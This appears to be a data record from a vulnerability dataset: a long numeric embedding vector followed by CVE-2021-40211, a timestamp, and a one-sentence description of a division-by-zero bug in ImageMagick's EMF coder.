-0.018206456676125526, 0.06553701311349869, 0.007794980425387621, -0.013580864295363426, -0.001793974544852972, 0.003118770895525813, -0.008394594304263592, -0.017583481967449188, -0.0003489636001177132, -0.009453652426600456, -0.010247945785522461, -0.013339461758732796, -0.002721623983234167, 0.001727783470414579, -0.005178483203053474, 0.01363537460565567, -0.02728632465004921, -0.010536071844398975, -0.02160167321562767, 0.009297908283770084, -0.0003458000428508967, -0.016742464154958725, -0.01001433003693819, -0.0015243430389091372, 0.002365359803661704, -0.0027819746173918247, 0.004181722644716501, -0.02415587194263935, 0.0071019199676811695, -0.014787879772484303, 0.018253181129693985, 0.001366652431897819, -0.01078526210039854, 0.012070149183273315, 0.0019760001450777054, 0.0007475705351680517, -0.003613257547840476, 0.002855953061953187, -0.006416647229343653, 0.00515512190759182, -0.00321221724152565, 0.04737728089094162, 0.004469848703593016, 0.01562889665365219, 0.005404312163591385, 0.0004256187821738422, 0.02466982789337635, -0.004828059580177069, -0.005645715165883303, 0.02529280260205269, -0.005116185639053583, 0.008301148191094398, -0.0038721817545592785, -0.0005110345664434135, -0.00011875469499500468, -0.000783586292527616, 0.01806628704071045, -0.01392350159585476, 0.013183717615902424, -0.0013617853401228786, 0.014219414442777634, -0.00425180746242404, 0.012109084986150265, 0.0035821087658405304, 0.00823885016143322, 0.014725581742823124, 0.0003465300833340734, -0.009897522628307343, 0.014741156250238419, 0.014211627654731274, -0.005587310995906591, -0.005112292245030403, -0.04560180380940437, 0.0012284297263249755, 0.025308378040790558, 0.007378365378826857, -0.005980564281344414, -0.019374536350369453, 0.012163595296442509, 0.018658114597201347, -0.023548472672700882, 0.011501683853566647, -0.024950167164206505, -0.007312174420803785, 0.005571736488491297, -0.0062998393550515175, 0.004851421341300011, 0.010302456095814705, 0.009352418594062328, 0.004493210464715958, -0.010349179618060589, 0.012755421921610832, -0.017692502588033676, -0.0066619436256587505, 0.02309681475162506, 0.0030078033450990915, -0.00846467912197113, -0.01692935824394226, -0.013113632798194885, -0.00973399169743061, 0.004695677198469639, -0.012841081246733665, 0.02163282223045826, 0.010878709144890308, 0.0063543496653437614, -0.010629518888890743, 0.01742773875594139, -0.025619864463806152, 0.0033699078485369682, 0.003430258482694626, -0.006938389036804438, -0.005828713998198509, -0.007082452066242695, 0.006128520704805851, 0.01697608083486557, -0.005723586771637201, 0.000764605007134378, 0.0031577066984027624, 0.017676929011940956, -0.001117462175898254, 0.015083792619407177, 0.019234366714954376, -0.04002617299556732, 0.010029904544353485, -0.024000128731131554, -0.004345253575593233, -0.0047346134670078754, -0.014912474900484085, -0.006611326709389687, -0.006704773288220167, -0.01597931981086731, 0.013043547980487347, -0.0062219672836363316, -0.006537348497658968, -0.002684634877368808, 0.01689820922911167, -0.01231933943927288, 0.021477079018950462, 0.010076628066599369, 0.017287569120526314, 0.006186924874782562, -0.0028248042799532413, 0.018377775326371193, -0.0028890485409647226, -0.0032647806219756603, -0.007981873117387295, -0.011073388159275055, 0.0037261717952787876, 0.020869677886366844, 0.009391354396939278, -0.006389392074197531, 0.009196675382554531, 0.027582237496972084, 0.005303078331053257, -0.00792736280709505, 0.007347216829657555, 0.011431599035859108, 0.018362201750278473, 0.017240844666957855, -0.01316814310848713, -0.010645092464983463, -0.002007148927077651, -0.004979909863322973, -0.014087032526731491, -0.005338120739907026, -0.008386806584894657, -0.029544610530138016, -0.02220907434821129, -0.004302424378693104, -0.0071291751228272915, -0.0067437090910971165, -0.010372540913522243, -0.0021375843789428473, -0.0237197894603014, 0.011673002503812313, -0.030198734253644943, 0.007393939886242151, 0.003959787543863058, 0.012420573271811008, 0.0005368296406231821, 0.0010395902208983898, -0.02113444171845913, 0.003147972747683525, -0.034668583422899246, -0.012373849749565125, 0.0110500268638134, 0.0024373913183808327, -0.0009490641532465816, 0.008488040417432785, -0.002484114607796073, -0.0257756095379591, 0.006288158241659403, -0.003013643668964505, -0.009570459835231304, 0.003040898824110627, 0.00579367158934474, 0.0034068969544023275, 0.0063037327490746975, -0.0036054702941328287, 0.001966266194358468, -0.008597061038017273, -0.0031362920999526978, 0.0062258606776595116, 0.004002617206424475, -0.0008254424901679158, -0.0175523329526186, -0.0037281187251210213, 0.023486174643039703, 0.0024802209809422493, 0.002630124567076564, -0.016384253278374672, 0.007919575087726116, -0.008885187096893787, -0.008386806584894657, 0.001554518355987966, -0.024965740740299225, 0.0028462191112339497, 0.0029318782035261393, 0.04697234928607941, 0.013689884915947914, 0.024919018149375916, -0.0011242759646847844, -0.000024532699171686545, -0.014562050811946392, -0.0050655691884458065, -0.017381014302372932, -0.0070474096573889256, -0.003704757196828723, 0.004839740693569183, -0.015846937894821167, 0.012669763527810574, -0.01749003492295742, 0.00529529107734561, -0.013136995024979115, -0.013105846010148525, 0.0013559450162574649, -0.0022797007113695145, 0.0011320632183924317, -0.018237605690956116, -0.005680757109075785, 0.0125918909907341, 0.012685337103903294, 0.035135816782712936, -0.03538500517606735, 0.004465955309569836, -0.0039130644872784615, 0.00022449016978498548, 0.012109084986150265, 0.004259594716131687, 0.015566598623991013, -0.019421258941292763, -0.010995516553521156, 0.00021536456188187003, -0.017131824046373367, 0.026040373370051384, -0.022987794131040573, -0.02415587194263935, -0.03332918509840965, -0.020324574783444405, 0.005976670887321234, 0.00826999917626381, -0.019935214892029762, 0.01471000723540783, 0.013378397561609745, 0.0016557519556954503, -0.013573077507317066, 0.011743087321519852, 0.008628210052847862, 0.017739225178956985, -0.01801956444978714, -0.007666491437703371, 0.009983181953430176, 0.026538753882050514, -0.005984457675367594, 0.016072766855359077, -0.007518535014241934, -0.022240223363041878, -0.0190941970795393, -0.004068808164447546, -0.007452343590557575, 0.011120111681520939, -0.009905309416353703, 0.0190941970795393, -0.007312174420803785, 0.0000499475427204743, -0.0012430306524038315, 0.026102671399712563, -0.020184405148029327, 0.0020636061672121286, -0.022302521392703056, 0.014546476304531097, 0.0016810602974146605, 0.001780346967279911, 0.003558747237548232, -0.01808186247944832, 0.01258410420268774, 0.00231084949336946, -0.016244085505604744, 0.001301434589549899, 0.022473840042948723, -0.005770309828221798, -0.0067437090910971165, -0.032643914222717285, 0.008340083993971348, -0.02529280260205269, -0.004170041996985674, 0.01859581656754017, -0.014725581742823124, 0.006000032182782888, -0.00380015023984015, 0.02576003409922123, -0.010652880184352398, -0.0033952160738408566, -0.006233647931367159, 0.0034185778349637985, -0.036724403500556946, -0.00870608165860176, -0.008674932643771172, 0.0028462191112339497, -0.0020947549492120743, -0.007740470115095377, -0.013915713876485825, 0.00448542321100831, -0.030634816735982895, -0.023455025628209114, -0.0128488689661026, 0.011470535770058632, 0.01336282305419445, -0.03292425349354744, -0.022520562633872032, -0.018720412626862526, 0.010699603706598282, 0.005232993513345718, 0.0031499196775257587, -0.0035120241809636354, -0.00928233377635479, 0.0013734662206843495, -0.017723651602864265, 0.010333605110645294, -0.000930569542106241, -0.00954709853976965, -0.005342014599591494, 0.016244085505604744, 0.0009106149082072079, 0.014826815575361252, -0.006046755239367485, 0.009554886259138584, 0.017178548499941826, 0.02322140894830227, -0.031693875789642334, 0.02063606120646, -0.017240844666957855, -0.0024880082346498966, -0.020963123068213463, -0.015667831525206566, 0.001288780476897955, -0.006587965413928032, 0.007678172551095486, 0.0015584119828417897, 0.005618460010737181, 0.023906683549284935, 0.006237541791051626, 0.004329679533839226, -0.009422503411769867, 0.018175307661294937, 0.0031849618535488844, 0.00007665518205612898, 0.004999377764761448, 0.009905309416353703, 0.008246637880802155, -0.023937830701470375, 0.0012829400366172194, -0.029061803594231606, -0.014811241067945957, 0.0028481658082455397, -0.006120733916759491, 0.01336282305419445, -0.0033309718128293753, 0.005466609727591276, 0.001686900737695396, -0.0030895688105374575, 0.014655496925115585, 0.004968229215592146, -0.009835224598646164, 0.0067125605419278145, 0.00019273303041700274, 0.002375093987211585, 0.016290808096528053, 0.010442625731229782, -0.011595130898058414, 0.014001373201608658, 0.003827405394986272, 0.027566663920879364, -0.005209632217884064, 0.005404312163591385, -0.00039982367889024317, -0.014141542837023735, 0.0347931794822216, 0.02579118311405182, -0.0024821676779538393, 0.0003925231867469847, -0.009850799106061459, 0.023891108110547066, 0.00904871802777052, -0.03697359189391136, -0.011649641208350658, -0.028189638629555702, 0.023828810080885887, 0.017832672223448753, 0.005342014599591494, 0.036257170140743256, 0.02116559073328972, 0.014273924753069878, -0.0022660731337964535, 0.012257041409611702, -0.0054237800650298595, -0.0020266170613467693, -0.02009095810353756, -0.006642475724220276, 0.017365440726280212, -0.0008400434744544327, 0.01703837886452675, -0.009126590564846992, 0.019203217700123787, 0.012404998764395714, -0.017334291711449623, -0.024903442710638046, -0.0034205245319753885, -0.014040309004485607, -0.027924874797463417, 0.004995484370738268, -0.01602604240179062, -0.00006241921801120043, -0.017349865287542343, 0.005937734618782997, 0.0038468732964247465, -0.006751496344804764, 0.011898830533027649, -0.019701598212122917, 0.007962404750287533, 0.016602296382188797, 0.005049994681030512, 0.0011924139689654112, -0.00045798427890986204, -0.01912534609436989, -0.003202483057975769, 0.01949913054704666, 0.00823885016143322, -0.010613944381475449, -0.028734741732478142, 0.022240223363041878, 0.012381636537611485, -0.005988351535052061, -0.006124627310782671, -0.011945554055273533, 0.01389235258102417, 0.023859959095716476, -0.0020636061672121286, 0.01573791727423668, -0.003977308981120586, 0.013604226522147655, 0.002707996405661106, 0.00954709853976965, -0.0003662414092104882, -0.018860582262277603, 0.005474396515637636, 0.014748943969607353, 0.022972218692302704, 0.019234366714954376, -0.011120111681520939, -0.03943434730172157, 0.004824166186153889, -0.0272396020591259, 0.014484179206192493, -0.00616356311365962, 0.0020032553002238274, -0.011307003907859325, 0.0015087686479091644, 0.012366062961518764, -0.030572520568966866, -0.0019098090706393123, 0.004232339560985565, 0.015636684373021126, 0.01361980102956295, 0.01602604240179062, 0.01050492376089096, -0.009149951860308647, 0.006482838187366724, -0.00719925994053483, -0.03153813257813454, -0.014328435063362122, 0.0041895098984241486, 0.00043267590808682144, 0.00692670838907361, -0.007530215661972761, 0.007351110223680735, 0.012996825389564037, 0.005486077629029751, 0.02012210711836815, 0.0042673819698393345, -0.007584725972265005, -0.019841767847537994, -0.002071393420919776, 0.018922878429293633, -0.013222653418779373, -0.012872230261564255, -0.030650392174720764, 0.003852713853120804, -0.01898517645895481, -0.020480317994952202, 0.025931352749466896, 0.02219350077211857, -0.0018027351470664144, 0.005334227345883846, -0.006774858105927706, 0.0016177893849089742, 0.004442593548446894, -0.009523737244307995, 0.004785229917615652, -0.011602917686104774, -0.019421258941292763, 0.0006813794025219977, 0.01393128838390112, 0.002951346104964614, -0.009305696003139019, 0.0012245360994711518, 0.006957856938242912, -0.001927330275066197, 0.000011992581676167902, -0.028392106294631958, 0.007872852496802807, 0.0010249892948195338, -0.00003440357613726519, 0.0025970288552343845, -0.005030526779592037, -0.0050383140332996845, -0.0013101951917633414, 0.025417398661375046, -0.0015486780321225524, 0.024015704169869423, -0.019732747226953506, -0.002429604297503829, -0.000006026709343132097, 0.006241435185074806, 0.02479442209005356, -0.00013286898320075125, -0.02208448015153408, 0.008729442954063416, -0.020355721935629845, -0.016789188608527184, 0.015558811835944653, -0.004018191713839769, -0.007343322969973087, 0.007448450196534395, -0.011416025459766388, -0.015776854008436203, -0.019203217700123787, 0.020729508250951767, 0.00950037594884634, 0.015831364318728447, -0.013495205901563168, -0.02116559073328972, 0.017349865287542343, -0.00475797476246953, 0.00022108327539172024, -0.028485551476478577, -0.005708012729883194, 0.003243365790694952, -0.020215552300214767, 0.0037670545279979706, 0.00928233377635479, -0.01235827524214983, -0.023984555155038834, -0.004127212334424257, 0.009477013722062111, 0.008815102279186249, 0.0015574386343359947, 0.010847560130059719, -0.009531524032354355, -0.010458200238645077, -0.030011842027306557, -0.014258350245654583, 0.012934527359902859, 0.011143472976982594, -0.011704151518642902, 0.0074601308442652225, 0.009492588229477406, -0.004469848703593016, -0.005342014599591494, -0.007436769548803568, 0.02733304724097252, 0.008083106018602848, -0.0039130644872784615, 0.0015097419964149594, -0.013066910207271576, 0.011135686188936234, 0.002976654563099146, -0.014741156250238419, -0.013946862891316414, -0.013534141704440117, 0.004099957179278135, -0.0019701598212122917, 0.016088340431451797, -0.02208448015153408, -0.0034477796871215105, 0.011805384419858456, -0.01649327576160431, -0.0055639492347836494, -0.020745081827044487, 0.014966985210776329, 0.0005193084361962974, 0.00002389390647294931, 0.03547845035791397, 0.00876837968826294, -0.004948761314153671, -0.0009412769577465951, 0.01694493182003498, -0.036319468170404434, -0.02057376317679882, -0.010902070440351963, -0.011174621991813183, 0.009928670711815357, -0.008854038082063198, 0.01316035632044077, -0.014359584078192711, 0.0003949567035306245, -0.00502663291990757, 0.00846467912197113, -0.02409357577562332, 0.004232339560985565, -0.015652257949113846, -0.004672315903007984, -0.016649018973112106, 0.0008745990926399827, 0.013985798694193363, -0.020168829709291458, 0.005384843796491623, 0.00978071428835392, -0.0036366190761327744, -0.007861170917749405, 0.017365440726280212, -0.009718417190015316, 0.02266073226928711, -0.0039266920648515224, 0.013269376941025257, 0.01157955639064312, 0.0039403196424245834, 0.007845597341656685, 0.02825193665921688, -0.006101265549659729, -0.025028038769960403, -0.0050655691884458065, -0.012303764931857586, -0.031351238489151, -0.006190818268805742, -0.001542837591841817, -0.018829433247447014, -0.000012722631254291628, 0.009952032938599586, -0.0034049502573907375, 0.018331052735447884, 0.0010259626433253288, 0.006315413396805525, -0.004205084405839443, -0.023797661066055298, -0.031070901080965996, -0.0190163254737854, -0.007253770250827074, 0.011758661828935146, 0.010255733504891396, 0.005778097081929445, 0.014344009570777416, 0.009523737244307995, 0.003451673313975334, 0.004442593548446894, 0.011462748050689697, -0.00820770114660263, 0.0058365012519061565, 0.010341392830014229, 0.030089713633060455, 0.02219350077211857, -0.013238227926194668, 0.013744396157562733, -0.010302456095814705, 0.005178483203053474, -0.020963123068213463, 0.019172068685293198, 0.021492652595043182, 0.013970224186778069, 0.001144717331044376, -0.016773613169789314, -0.004018191713839769, 0.011408237740397453, 0.011774236336350441, -0.006556816399097443, 0.020994272083044052, -0.003624938428401947, -0.004356934688985348, -0.011696363799273968, 0.004851421341300011, -0.007160324137657881, 0.022458264604210854, 0.006677518133074045, -0.001144717331044376, 0.017209697514772415, -0.0003105143259745091, -0.015029282309114933, 0.029186399653553963, -0.02208448015153408, -0.01801956444978714, -0.0034088436514139175, -0.00733553571626544, 0.02875031717121601, 0.00308178155682981, -0.031179921701550484, -0.013222653418779373, -0.00897084642201662, 0.004851421341300011, -0.015177239663898945, 0.00981186330318451, 0.02052704058587551, -0.01489690039306879, 0.011166835203766823, -0.016789188608527184, -0.007939043454825878, 0.0033523866441100836, -0.004259594716131687, 0.0067709642462432384, 0.001103834598325193, 0.016384253278374672, -0.002486061304807663, 0.004660635255277157, -0.0035898960195481777, 0.02940444089472294, -0.0019185696728527546, 0.029497887939214706, 0.02681909315288067, 0.008332296274602413, 0.010185648687183857, 0.0002193798281950876, -0.011096750386059284, -0.01005326583981514, -0.012404998764395714, 0.02319026179611683, 0.02424931898713112, 0.000943223771173507, -0.011525046080350876, 0.008051957935094833, 0.0059455218724906445, 0.004859208595007658, 0.001500981510616839, -0.029731502756476402, -0.018190883100032806, -0.011423812247812748, -0.018175307661294937, -0.018907304853200912, 0.033702973276376724, -0.009835224598646164, -0.002275807084515691, 0.002998069394379854, 0.007218727841973305, -0.026959262788295746, 0.031600430607795715, -0.009461439214646816, -0.001580800162628293, -0.0018698996864259243, -0.011532832868397236, 0.01027130801230669, 0.007413407787680626, 0.016649018973112106, 0.006120733916759491, 0.005750841926783323, -0.006732028443366289, 0.0001911512517835945, 0.005731374025344849, -0.020807379856705666, 0.00974177848547697, 0.01104224007576704, 0.02057376317679882, 0.016041617840528488, 0.003471141215413809, 0.009874160401523113, -0.00289683579467237, 0.018876155838370323, 0.00017034485063049942, -0.002748879138380289, 0.008838464505970478, -0.017131824046373367, -0.00827778596431017, -0.011151260696351528, -0.008721656166017056, 0.005361482501029968, 0.0008137616678141057, 0.00021913647651672363, -0.017162973061203957, -0.004921506159007549, -0.009438077919185162, 0.016197361052036285, -0.007386152632534504, -0.0024198703467845917, 0.01703837886452675, -0.008916336111724377, -0.002964973682537675, 0.00025819410802796483, -0.02111886814236641, -0.005046101287007332, 0.022754177451133728, -0.017739225178956985, 0.012249254621565342, -0.0037553738802671432, 0.006887772120535374, -0.028392106294631958, -0.0017998149851337075, 0.03398330882191658, -0.010520498268306255, -0.015636684373021126, -0.025495270267128944, 0.03248817101120949, 0.006837155669927597, 0.014966985210776329, 0.009718417190015316, 0.011197983287274837, 0.00017484682030044496, 0.0016849539242684841, 0.009220036678016186, 0.004909825045615435, -0.01162627898156643, 0.014507540501654148, -0.019312238320708275, -0.018704837188124657, -0.02628956362605095, 0.014001373201608658, -0.019436834380030632, -0.014873539097607136, 0.011377088725566864, 0.011641853488981724, 0.01956142857670784, 0.012070149183273315, 0.03083728440105915, -0.018813857808709145, -0.017209697514772415, -0.015231749974191189, 0.020713932812213898, 0.008955271914601326, 0.01027130801230669, -0.012685337103903294, 0.009726203978061676, -0.02004423551261425, -0.021928735077381134, 0.013004612177610397, 0.006852729711681604, 0.01850237138569355, 0.0236419178545475, -0.0036152044776827097, -0.007553577423095703, 0.036226022988557816, -0.018611392006278038, 0.03663095459342003, 0.0050149522721767426, -0.003161600325256586, -0.005711906123906374, -0.011151260696351528, -0.011104537174105644, 0.003963681403547525, 0.004314105026423931, -0.010434838943183422, -0.0046333796344697475, -0.003918904811143875, 0.017661353573203087, 0.031070901080965996, -0.02272302843630314, 0.014328435063362122, 0.006038967985659838, 0.0059182667173445225, -0.018393350765109062, -0.003994829952716827, -0.006883878726512194, -0.0005480237305164337, 0.024389488622546196, 0.012225893326103687, -0.008729442954063416, -0.01703837886452675, -0.013487418182194233, 0.013051335699856281, 0.0035762684419751167, 0.02775355614721775, -0.011509471572935581, 0.004181722644716501, -0.002988335443660617, -0.015488727018237114, -0.02414029836654663, -0.002217403147369623, -0.022847624495625496, -0.00529139768332243, -0.0033913226798176765, 0.012576316483318806, -0.007931255735456944, -0.010356966406106949, 0.009710629470646381, 0.00000495064705319237, -0.000016973646779661067, -0.02368864044547081, 0.006404966115951538, -0.015605534426867962, -0.009111016057431698, 0.002363413106650114, -0.00874501746147871, 0.0008945537847466767, -0.01996636390686035, -0.014055883511900902, 0.025121483951807022, -0.00012885371688753366, -0.019763896241784096, 0.0174744613468647, -0.01312920730561018, -0.023081239312887192, 0.007674278691411018, 0.00656071025878191, -0.000511521240696311, -0.020449168980121613, 0.0016168159199878573, -0.00033995966077782214, -0.013370610773563385, 0.004968229215592146, -0.012412785552442074, -0.00488646375015378, 0.006809900514781475, -0.023018943145871162, 0.007573045324534178, -0.023517323657870293, 0.014865751378238201, 0.019281089305877686, -0.0009743725531734526, -0.01235827524214983, 0.019218793138861656, 0.01750561036169529, -0.007269344758242369, -0.020713932812213898, -0.0047073583118617535, -0.0021336909849196672, -0.016680167987942696, -0.014312860555946827, 0.01366652362048626, -0.012459509074687958, 0.023797661066055298, -0.00047185522271320224, -0.0022777540143579245, 0.010341392830014229, -0.006879984866827726, -0.01644655130803585, 0.020418019965291023, -0.01416490413248539, -0.015076005831360817, 0.014087032526731491, -0.015566598623991013, 0.004399763885885477, -0.0020928080193698406, -0.02823636122047901, 0.0021434249356389046, -0.000215607913560234, -0.0010415370343253016, -0.01697608083486557, 0.0020032553002238274, 0.011486109346151352, -0.01741216331720352, -0.015582173131406307, 0.01896960288286209, 0.004134999588131905, 0.002604816108942032, 0.02155495062470436, 0.008550337515771389, -0.007608087733387947, 0.002098648576065898, -0.01697608083486557, 0.004610018339008093, -0.0037982033099979162, 0.011439386755228043, -0.01803513988852501, 0.022255796939134598, 0.014850176870822906, -0.009663906879723072, 0.017863821238279343, -0.011026665568351746, 0.006416647229343653, 0.010076628066599369, -0.009640544652938843, 0.007623661775141954, -0.011416025459766388, -0.00308178155682981, -0.002268020063638687, -0.002098648576065898, -0.0054237800650298595, 0.009835224598646164, -0.009406928904354572, -0.0006400099373422563, -0.006642475724220276, 0.01231155265122652, 0.004434806294739246, 0.005330333486199379, 0.022411542013287544, -0.003953947219997644, -0.003120717592537403, 0.006319307256489992, -0.022847624495625496, -0.0067164539359509945, -0.0036872359924018383, 0.004450380802154541, -0.014102607034146786, 0.001712209079414606, -0.007611981127411127, -0.0006954936543479562, 0.002565880073234439, 0.0066853053867816925, -0.002667113672941923, -0.004181722644716501, 0.011571768671274185, -0.014421881176531315, 0.010769687592983246, -0.01004547905176878, -0.028999507427215576, 0.004539933521300554, -0.00017095322255045176, 0.001114542013965547, -0.01205457467585802, 0.004808591678738594, -0.0032472594175487757, -0.007783299311995506, -0.015356345102190971, -0.0062998393550515175, -0.009375780820846558, -0.007203153800219297, -0.030011842027306557, 0.007981873117387295, 0.028438828885555267, 0.011641853488981724, 0.0019896277226507664, 0.007382259238511324, 0.005618460010737181, -0.000982159748673439, -0.0028325915336608887, 0.02473212592303753, -0.010972155258059502, 0.011073388159275055, -0.0042128716595470905, 0.005159015301615, 0.006720347795635462, -0.004177829250693321, -0.0042946371249854565, 0.029201973229646683, 0.01289559155702591, 0.027146155014634132, -0.020838528871536255, 0.003227791516110301, 0.010847560130059719, -0.0009636651375330985, 0.013277163729071617, 0.005030526779592037, 0.011961128562688828, -0.0005392631283029914, 0.01338618528097868, 0.001793974544852972, 0.0006054542609490454, -0.026009224355220795, -0.015893660485744476, -0.004664528649300337, -0.0011768395779654384, 0.020168829709291458, -0.005447141360491514, 0.01850237138569355, 0.029560184106230736, 0.01312920730561018, 0.011470535770058632, 0.004660635255277157, -0.009632757864892483, -0.0034224712289869785, -0.007039622403681278, -0.004508784972131252, -0.00026379115297459066, 0.006747602950781584, 0.012638614512979984, 0.006089584901928902, -0.012724273838102818, 0.04747072979807854, -0.008760591968894005, -0.01051271054893732, -0.005380950402468443, 0.007647023536264896, -0.0018669795244932175, 0.020698359236121178, 0.003994829952716827, 0.0023828810080885887, -0.004726826213300228, -0.013526353985071182, -0.005205738358199596, -0.006003926042467356, -0.015480940230190754, 0.033266887068748474, 0.0078767454251647, 0.02979380078613758, 0.028921635821461678, 0.022411542013287544, -0.0014260297175496817, 0.01946798339486122, 0.017848245799541473, -0.02104099653661251, 0.0008609715150669217, 0.016135064885020256, -0.012225893326103687, 0.007576938718557358, -0.005365375895053148, 0.013378397561609745, -0.029638057574629784, 0.017303142696619034, 0.029949543997645378, 0.008137616328895092, 0.005735267885029316, -0.0315069817006588, -0.006755389738827944, 0.0019837873987853527, 0.022333670407533646, -0.0024101361632347107, 0.00897084642201662, -0.007822235114872456, -0.004399763885885477, 0.00167424650862813, 0.028952782973647118, -0.010917644947767258, -0.015083792619407177, -0.01389235258102417, 0.00602339394390583, 0.020495891571044922, -0.03846873342990875, 0.01691378280520439, 0.011454961262643337, -0.018673688173294067, -0.027597812935709953, -0.005334227345883846, 0.007693746592849493, 0.012973463162779808, -0.013830054551362991, -0.008939697407186031, 0.011704151518642902, -0.013767757453024387, 0.010598369874060154, -0.00013396405847743154, -0.006977324839681387, -0.01590144820511341, -0.0063309879042208195, 0.01000654324889183, 0.006989005953073502, 0.005283610429614782, 0.02311238832771778, 0.004839740693569183, -0.005353695247322321, 0.014320648275315762, -0.001023042481392622, -0.00438808323815465, -0.0036054702941328287, -0.01996636390686035, 0.0019633460324257612, 0.01853351853787899, -0.005622353404760361, -0.013806693255901337, 0.0051239728927612305, -0.000677485775668174, -0.025915779173374176, -0.0012186956591904163, -0.0004655281372833997, 0.010162287391722202, -0.00746402470394969, 0.009181100875139236, 0.013043547980487347, 0.014242775738239288, -0.00475408136844635, -0.023813236504793167, 0.0032861954532563686, 0.0029708142392337322, -0.024311617016792297, 0.02320583537220955, -0.0031927491072565317, -0.026460882276296616, 0.0010833932319656014, -0.014787879772484303, 0.04768877103924751, -0.014087032526731491, -0.0012459509307518601, 0.012039000168442726, -0.002641805214807391, 0.008643784560263157, -0.004282956011593342, -0.033142294734716415, -0.020791806280612946, -0.0005499704857356846, 0.010730751790106297, 0.02977822534739971, -0.018128585070371628, -0.013978011906147003, 0.01689820922911167, -0.016789188608527184, 0.0007368631195276976, 0.011610704474151134, 0.0031168239656835794, -0.005801458843052387, 0.0012002011062577367, 0.010403689928352833, -0.008285573683679104, -0.010645092464983463, 0.011127898469567299, 0.006510093342512846, 0.016633443534374237, 0.016181787475943565, -0.01599489524960518, 0.013300525955855846, -0.014359584078192711, -0.005174589809030294, -0.00602728733792901, -0.006070117000490427, -0.054261162877082825, -0.011937767267227173, -0.0013559450162574649, 0.001328689861111343, -0.0031304515432566404, 0.02828308567404747, 0.012264829128980637, -0.01393907517194748, 0.00438418984413147, 0.0012683391105383635, -0.015076005831360817, 0.014764518477022648, 0.009796288795769215, -0.014234988950192928, -0.005232993513345718, 0.02107214368879795, 0.0019039687467738986, 0.005910479463636875, -0.02320583537220955, 0.003017537295818329, -0.008371232077479362, 0.012202531099319458, -0.01806628704071045, -0.0014435509219765663, 0.0021161697804927826, -0.040836039930582047, -0.006751496344804764, 0.014616561122238636, -0.006786538753658533, -0.0031109836418181658, 0.002606762805953622, -0.009391354396939278, 0.02004423551261425, 0.011992277577519417, -0.00212590373121202, 0.005622353404760361, -0.01288780476897955, 0.014920261688530445, -0.01845564693212509, -0.005750841926783323, -0.004380295984447002, -0.015099367126822472, 0.052236489951610565, -0.009196675382554531, 0.019343387335538864, 0.010598369874060154, 0.01566004566848278, -0.0031713342759758234, -0.006922814529389143, 0.020900826901197433, 0.008262211456894875, -0.017739225178956985, 0.009601608850061893, -0.00770153384655714, 0.007549683563411236, -0.0013393971603363752, -0.014087032526731491, -0.00793514959514141, -0.008558125235140324, -0.012342700734734535, -0.026492031291127205, 0.0012654188321903348, 0.0007938069757074118, 0.006003926042467356, -0.008262211456894875, -0.008939697407186031, -0.011571768671274185, 0.00040834094397723675, -0.016212936490774155, 0.001128169591538608, -0.014951410703361034, -0.008308934979140759, 0.014227202162146568, 0.006681411527097225, 0.012194744311273098, 0.007721001747995615, 0.007253770250827074, -0.00904093123972416, -0.021959884092211723, 0.0136587368324399, -0.007347216829657555, -0.007865064777433872, -0.010536071844398975, -0.007907894439995289, 0.004310211166739464, -0.005964989773929119, 0.002643752144649625, 0.029996268451213837, 0.0018095489358529449, -0.016181787475943565, 0.007308280561119318, 0.009858586825430393, -0.0011885203421115875, 0.007654810789972544, 0.0125918909907341, 0.01470222044736147, 0.01594817079603672, -0.0009354365756735206, 0.01181317213922739, -0.003455566940829158, -0.01027909480035305, -0.005824820604175329, 0.006229754537343979, -0.029466738924384117, -0.011470535770058632, 0.009227823466062546, -0.02325255796313286, 0.01851794496178627, 0.021772991865873337, -0.005598991643637419, -0.004898144397884607, 0.033235739916563034, -0.0016148691065609455, -0.007942937314510345, -0.015294047072529793, 0.0018757401267066598, 0.015379706397652626, -0.020340148359537125, 0.004279062617570162, -0.020900826901197433, 0.001340370625257492, -0.016820337623357773, 0.005470503121614456, -0.004863101989030838, -0.0010541912633925676, -0.014974771998822689, -0.009329057298600674, -0.015013707801699638, -0.012373849749565125, -0.013269376941025257, -0.014787879772484303, 0.007249876856803894, 0.023953406140208244, 0.008597061038017273, -0.0014192159287631512, -0.016695741564035416, 0.00321221724152565, -0.0075964066199958324, -0.017194122076034546, 0.007787193171679974, -0.014826815575361252, 0.02315911278128624, 0.04046225547790527, 0.0012118818704038858, 0.003708650590851903, 0.010395903140306473, 0.00026768475072458386, -0.017225271090865135, -0.012957889586687088, -0.0007582779508084059, -0.0018981283064931631, 0.010621731169521809, 0.00954709853976965, 0.02325255796313286, -0.006513987202197313, -0.006401072721928358, -0.011867682449519634, -0.006510093342512846, -0.0071525368839502335, 0.009624970145523548, 0.007623661775141954, 0.004438700154423714, -0.010894282720983028, 0.00475408136844635, 0.02213120274245739, -0.01596374623477459, -0.00977292750030756, -0.005217419471591711, 0.011065601371228695, -0.007884533144533634, 0.02359519526362419, 0.01639982871711254, -0.015457578003406525, 0.0058637564070522785, -0.0023848279379308224, 0.0013092218432575464, -0.002182360738515854, -0.008877400308847427, 0.008355658501386642, 0.01948355697095394, 0.007351110223680735, 0.023548472672700882, 0.004571082536131144, 0.012342700734734535, 0.003013643668964505, 0.009383567608892918, -0.006778751499950886, -0.0014513380592688918, -0.005057781934738159, -0.005711906123906374, -0.01597931981086731, -0.02415587194263935, 0.021430354565382004, 0.0004093143215868622, 0.009414716623723507, -0.0036152044776827097, -0.00719536654651165, 0.01540306769311428, -0.019919639453291893, 0.01212465949356556, 0.00015428375627379864, 0.0033056633546948433, -0.00851140171289444, -0.0004146680294070393, 0.007915682159364223, 0.00366582116112113, 0.00954709853976965, 0.0075925132259726524, 0.020854102447628975, -0.012039000168442726, 0.008635996840894222, -0.014795666560530663, 0.0013880671467632055, -0.006517880596220493, -0.0004078542406205088, -0.01795726642012596, 0.02167954482138157, -0.007783299311995506, 0.002100595273077488, -0.016867060214281082, 0.011517258360981941, 0.0009738858207128942, 0.01051271054893732, 0.012724273838102818, -0.01803513988852501, -0.005462715867906809, 0.05058560520410538, -0.00276250671595335, 0.0031674408819526434, 0.0025814545806497335, -0.021882012486457825, -0.015504301525652409, -0.010216797702014446, -0.031070901080965996, 0.0118598947301507, -0.02267630584537983, -0.0190941970795393, -0.0011534779332578182, -0.0026632200460880995, -0.016181787475943565, 0.02063606120646, 0.013876778073608875, -0.0012031212681904435, -0.02579118311405182, -0.006373817566782236, 0.022847624495625496 ]
CVE-2021-40211
2023-08-22T19:16:21.427000
An issue was discovered with ImageMagick 7.1.0-4 via Division by zero in function ReadEnhMetaFile of coders/emf.c.
